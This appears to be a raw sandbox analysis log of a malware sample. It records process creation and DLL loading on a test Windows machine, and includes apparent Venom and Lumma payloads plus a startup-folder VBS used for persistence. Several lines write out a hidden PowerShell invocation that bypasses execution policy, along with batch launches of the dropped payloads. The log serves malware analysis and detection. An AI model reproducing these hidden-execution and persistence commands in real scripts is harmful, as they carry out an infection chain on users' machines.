Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\2D42.exe C:\Users\user\AppData\Local\Temp\2D42.exe
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process created: C:\Users\user\AppData\Local\Temp\2D42.exe "C:\Users\user\AppData\Local\Temp\2D42.exe" -HOSTRUNAS
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\EF14.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\ExtractedLumma\run.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe "vm.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe "lm.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe "vm.exe"
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2004 -s 1092
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5724 -s 1680
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\8EC7.exe "C:\Users\user\AppData\Local\Temp\8EC7.exe"
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\8EC7.exe "C:\Users\user\AppData\Local\Temp\8EC7.exe"
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\8EC7.exe C:\Users\user\AppData\Local\Temp\8EC7.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\EF14.exe C:\Users\user\AppData\Local\Temp\EF14.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\2D42.exe C:\Users\user\AppData\Local\Temp\2D42.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\8EC7.exe "C:\Users\user\AppData\Local\Temp\8EC7.exe" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\8EC7.exe "C:\Users\user\AppData\Local\Temp\8EC7.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EF14.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process created: C:\Users\user\AppData\Local\Temp\2D42.exe "C:\Users\user\AppData\Local\Temp\2D42.exe" -HOSTRUNAS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\ExtractedLumma\run.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe "vm.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe "lm.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe "vm.exe"
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: cdprt.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: cdprt.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: wpnapps.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: execmodelproxy.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: capabilityaccessmanagerclient.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: smartscreenps.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: smartscreenps.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: smartscreenps.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: vcruntime140_1.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: vcruntime140_1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\adjijwj Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EF14.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EF14.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EF14.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: mshtml.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: srpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: msiso.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: uiautomationcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: winhttp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: webio.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: mswsock.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: iphlpapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: winnsi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: sspicli.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: dnsapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: rasadhlp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: schannel.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ntasn1.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ncrypt.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: msasn1.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: cryptsp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: rsaenh.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: cryptbase.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: gpapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: dpapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: wbemcomn.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: amsi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: userenv.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: profapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: version.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: uxtheme.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: g2m.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: g2m.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Section loaded: winnsi.dll
